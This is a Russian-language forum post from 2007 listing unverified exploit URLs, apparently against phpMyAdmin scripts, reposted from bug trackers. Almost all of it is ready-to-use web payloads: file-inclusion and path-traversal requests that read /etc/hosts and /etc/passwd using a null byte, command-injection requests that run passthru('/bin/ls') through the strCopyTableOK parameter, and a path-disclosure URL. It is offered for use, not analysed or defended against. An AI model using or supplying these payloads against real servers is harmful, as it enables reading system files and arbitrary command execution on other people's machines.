19.12.2007, 07:17
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Скажу тупо взято с баг траков и не поверенно, все уязвисости не предоставляют особой опасноти.
От меня :
Инклуды.
Код:
./tbl_replace.php?db=test&table=test&goto=/etc/hosts
./sql.php?goto=/etc/hosts&btnDrop=No
./export.php?what=../../../../../../etc/passwd%00
Поизвольное иполнение команд:
Код:
./tbl_copy.php?strCopyTableOK=.passthru('/bin/ls').
./tbl_copy.php?db=test&table=test&new_name=test.test2&strCopyTableOK="".passthru('/bin/ls')."""
Раскрытие пути.
Код:
./libraries/grab_globals.lib.php
|
|
|